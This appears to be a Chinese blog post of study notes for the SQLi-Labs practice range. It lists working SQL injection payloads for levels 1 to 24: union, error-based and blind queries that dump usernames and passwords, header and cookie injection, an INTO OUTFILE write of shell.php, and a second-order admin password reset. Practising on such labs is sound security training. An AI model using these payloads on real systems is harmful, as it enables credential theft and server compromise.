Sqli-Labs-Study

最新推荐文章于 2024-08-20 13:24:05 发布
最新推荐文章于 2024-08-20 13:24:05 发布
阅读量537 收藏 18
点赞数 11
文章标签: 数据库 mysql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/s0Sick_/article/details/140940030
版权

# Less-1
SELECT * FROM users WHERE id='$id' LIMIT 0,1;
select * from goods where gid='1' union select 1, 2, 3#' limit 0, 1;
select * from goods order by gid desc; # asc正序 desc倒序
# order by 可以根据列数来排序,正因如此也可以检测列数,结合二分法
select * from goods where gid = '-1' union select 1, 2, 3#' limit 0, 1;
# 让gid查询不到就可以执行后面的联合查询
select * from goods where gid = '-1' union select 1, database(), user()#' limit 0, 1;
# 利用联合查询查询到了database和user

# 利用information_schema的tables的(table_name, table_schema), columns, schemata的schema_name
select table_name from tables where table_schema='security';
select table_name from tables where table_schema=database();
select column_name from columns where table_schema='security' and table_name='users';
select username, password from security.users;

'
-1' union select 1, 2, group_concat(username,password) from users#

# Less-2
SELECT * FROM users WHERE id=$id LIMIT 0,1;
-1 union select 1, 2, group_concat(username,password) from users#

# Less-3
SELECT * FROM users WHERE id=('$id') LIMIT 0,1;
('
-1') union select 1, 2, group_concat(username,password) from users#

# Less-4
SELECT * FROM users WHERE id=($id) LIMIT 0,1;
("
-1") union select 1, 2, group_concat(username,password) from users#

# Less-5
'
1' and updatexml(1, concat(0x23, user(), 0x23) ,3)#
'
1' and updatexml(1, concat(0x23, (select group_concat(username, 0x3a, password) from users), 0x23), 3)#
'
1' and updatexml(1, concat(0x23, substr((select group_concat(username, 0x3a, password) from users),  1,  32), 0x23), 3)#
# 通过substr每次截取32位


# Less-6
"
1" and updatexml(1, concat(0x23, substr((select group_concat(username, 0x3a, password) from users),  1,  32), 0x23), 3)#


# Less-7 use outfile
/*
outfile条件苛刻
以下3点
mysql用户权限必须为root
知道网站物理路径
secure_file_priv参数为空
*/
(('
1')) union select 1, 2, "<?php phpinfo();>" into outfile "/var/www/html/sqli-labs/Less-7/shell.php";#
(('
1')) and updatexml(1, concat(0x23, substr((select group_concat(username, 0x3a, password) from users),  1,  32), 0x23), 3)#


# Less-8
# 布尔盲注,只有true和false两个状态
'
1' and ascii(substr(database(), 1, 1)) = 115#
'
1' and ascii(substr(database(), 1, 1)) > 11#
# 利用substr截取第一个字符再使用ascii转成ascii码与>, <, =等符号后的值进行比较逐位取得表名,可用二分法加速
'
1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = database()), 1, 1)) > 11#
# 比较ascii表转表名,用二分法,可用python自动化


# Less-9
# 时间盲注
'
1' and if(ascii(substr(database(), 1, 1)) > 100, sleep(1), 0)#
# 值为true时便使网页sleep1s,可借由次判断注入
'
1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = database()), 1, 1)) > 100, sleep(1), 0)#


# Less-10
"
1" and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = database()), 1, 1)) > 100, sleep(1), 0)#


# Less-11
# post注入
'admin'#
'
a' union select 1, user()#
#不正确的用户名也可以,使用联合查询只要结果为true就可以
'
a' union select 1, group_concat(table_name) from information_schema.tables where table_schema = database()#
'
a' union select 1, group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#
'
a' union select 1, group_concat(username, password) from users#

# Less-12
("
a") union select 1, group_concat(username, password) from users#

# Less-13
# 无回显,利用updatexml报错注入
('
a') and updatexml(1, concat(0x23, user(), 0x23), 3)#
('
a') and updatexml(1, concat(0x23, (select group_concat(username, 0x3a, password) from users), 0x23), 3)#
('
a') and updatexml(1, concat(0x23, substr((select group_concat(username, 0x3a, password) from users), 1, 32), 0x23), 3)#
('
a') and updatexml(1, concat(0x23, substr((select group_concat(username, 0x3a, password) from users), 32, 64), 0x23), 3)#
# 由于updatexml只回显32位,所以使用substr依次截取32位拼接


# Less-14
"
a" and updatexml(1, concat(0x23, (select group_concat(username, 0x3a, password) from users), 0x23), 3)#

# Less-15
# post布尔盲注
'
admin' and ascii(substr(database(), 1, 1)) = 115#
'
admin' and ascii(substr(database(), 1, 1)) > 100#
# 比较ascii值转表名,用二分法更快,可用python自动化

#Less-16
("
admin") and ascii(substr(database(), 1, 1)) = 115#


# Less-17
# 密码重置用户名被过滤但密码没有
# 密码处利用updatexml报错注入
'
1' and updatexml(1, concat(0x7e, user(), 0x7e), 3)#
'
1' and updatexml(1, concat(0x7e, (select group_concat(username, 0x3a, password) from users), 0x7e), 3)#
'
1' and updatexml(1, concat(0x7e, substr((select group_concat(username, 0x3a, password) from users), 1, 32), 0x7e), 3)#
# 利用substr每次截取32位
select count(*), concat(user(), floor(rand(0)*2)) as x from information_schema.tables group by x
# floor, rand, group by报错注入
'
1' and (select 1 from (select count(*), concat(user(), floor(rand(0)*2)) as x from information_schema.tables group by x) as y)#
'
1' and (select 1 from (select count(*), concat((select password from users where username = 'admin'), floor(rand(0)*2)) as x from information_schema.tables group by x) as y)#


# Less-18
# username, password都被过滤但可使用burpsuit抓包修改user-agent注入
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)
'
a' and updatexml(1, concat(0x7e, user(), 0x7e), 3) and '1' = '1
'
# 闭合方式
('
a' and updatexml(1, concat(0x7e, user(), 0x7e), 3), '1.1.1.1', 'admin')#
# 注释方式,需补齐后面参数


# Less-19
# 利用burpsuit修改referer注入
'
a' and updatexml(1, concat(0x7e, user(), 0x7e), 3) and '1' = '1
'
# 闭合方式
('
a' and updatexml(1, concat(0x7e, user(), 0x7e), 3), '1.1.1.1', 'admin')#
# 注释方式,需补齐后面参数


# Less-20
# 利用burp修改cookie注入
'
a' and updatexml(1, concat(0x7e, user(), 0x7e), 3) and '1' = '1
'
# 闭合方式
('
a' and updatexml(1, concat(0x7e, user(), 0x7e), 3), '1.1.1.1', 'admin')#
# 注释方式,需补齐后面参数
'
-1' union select 1, 2, group_concat(username,password) from users#
# 联合查询


# Less-21
# cookie使用base64加密处理了,利用burp抓包base64加密注入代码传入即可,并改变了闭合方式
('
a') and updatexml(1, concat(0x7e, user(), 0x7e), 3) and '1' = '1
'
# 闭合方式
(('
a') and updatexml(1, concat(0x7e, user(), 0x7e), 3), '1.1.1.1', 'admin')#
# 注释方式,需补齐后面参数
('
-1') union select 1, 2, group_concat(username,password) from users#
# 联合查询


# Less-22
# 同21,仅改变了闭合方式
"
a" and updatexml(1, concat(0x7e, user(), 0x7e), 3) and '1' = '1
'
# 闭合方式
"
a" and updatexml(1, concat(0x7e, user(), 0x7e), 3), '1.1.1.1', 'admin')#
# 注释方式,需补齐后面参数
"
-1" union select 1, 2, group_concat(username,password) from users#
# 联合查询


# Less-23
# 过滤了注释符号
'
1' and updatexml(1, concat(0x7e, user(), 0x7e), 1) and '1' = '1
'
# 闭合方式


# Less-24
# 修改密码,二次注入
/*
登录均存在过滤,
但由于注册账户username字段没有过滤,可用注册一个账户在已知admin账户后添加闭合并注释后续字段,
即,admin'#,再已此账户登录修改密码,由于闭合了后续字段并注释掉多余的分号,
这样就修改了admin账户的密码
*/
UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass'
UPDATE users SET PASSWORD='$pass' where username='admin'#' and password='$curr_pass'
# 利用admin'#修改了admin的密码

s0Sick_
关注
  • 11
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs环境搭建及复现
m0_74344277的博客
09-06 970
安装完后打开软件,开启nginx和mysql
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场搭建
joey_1123的博客
05-21 1047
4.打开D:\phpstudy_pro\WWW\sqli-labs\sql-connections中的db-creds.inc 修改如图。3.把这个解压到php根目录下 修改名字为sqli-labs。9.退回再点第一个SQLi-LABS Page…7.用浏览器访问127.0.0.1/sqli-labs。5.修改phpstudy数据库的密码为123456。2.去github上下载sqli-labs。8.点击第二个选项Setup/reset…注:不能使用 php7.x 版本。sqli-labs靶场搭建。
phpstudy 搭建 sqli-labs SQL 注入靶场
两个月亮
12-25 1105
在过去,如果文件的名称仅大小写不同,则 Windows 将无法访问这些文件,因为 Windows 应用程序将文件系统视为不区分大小写,并且无法区分名称仅大小写不同的文件。所以刚刚的 Warning 是在提醒我们,GitHub 中的目标项目中的某个文件夹中出现了有大小写之分的同名文件。Windows 的文件系统默认是对文件夹大小写不敏感的,也就是说 Class 文件夹与 class 会被认为是同一个文件夹,不单单是文件夹,对文件也是这样的。,使用 cd 命令切换到将用来安装项目文件的目录下。
安全小记-sqli-labs闯关
山月不问人间事
01-29 1177
SQLI,sql injection,我们称之为sql注入。何为sql,英文:Structured Query Language,叫做结构化查询语言。常见的结构化数据库MySQL,MS SQL ,Oracle以及PostgresqlSql语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常说的sql注入。
sqli-labs-master 下载、搭建
m0_63521991的博客
01-28 993
sqli-labs-master 是一个帮助用户学习和测试 SQL 注入漏洞的开源项目。它提供了一系列的环境,用户可以在这些环境中进行实验,学习如何检测、利用和防御 SQL 注入攻击。sqli-labs 下载地址: github.com/Audi-1/sqli-labs。
Sqli-labs-maste靶场的下载、配置
weixin_68416970的博客
06-05 635
Sqli-labs-master靶场的下载、配置教程
PHP、Apache环境中部署sqli-labs
2301_79512681的博客
06-14 165
部署sqli-labs靶场
sqli sqli-labs 部署
CY_LAN9999的博客
07-08 312
至此就可以开始你的sqli练习。
SQL注入实验-- SQLi-Labs
m0_51427256的博客
11-19 918
​1、安装phpstudy 1)下载:https://www.xp.cn/ 2)一键式安装:右下角自定义可以更改安装路径 3)打开apache和mysql
sqli-labs-master靶场安装下载
04-01
安装phpstudysqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
【达梦数据库】-导入导出过程中get DDL复现过程
weixin_47686079的博客
08-20 185
在处理问题的过程中,客户反馈在达梦数据库中导入导出分区表,get 表的DDL,不会出现表的所有分区信息,ORACLE数据库却会出现所有分区表,事实真的如此吗?
linux安装达梦数据库
HAN_789的博客
08-19 203
如果无法创建dmdba 文件夹,需要进入root用户下 在管理员用户下,这种安装方式一般只用于验证,开发,测试,生产最好还是安装传统的方式安装。在 home/dmdba/dmdbms/bin 目录下执行。(1)将文件上传到 /home/dmdba/ 目录下。(2)加压:tar -xzvf dmdb.tar.gz。进入到root就可以创建dmdba 文件夹了。1、后台启动,一般建议用后台启动。
分布式事务:基本概念
最新发布
玉汝于成
08-20 199
事务可以看做事一次大的活动,它由不同的小的活动组成,这些活动要么全部成功,要么全部失败。
网上商品订单转手系统bootpf
weixin_43213064的博客
08-18 495
【代码】springboot网上商品订单转手系统bootpf
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值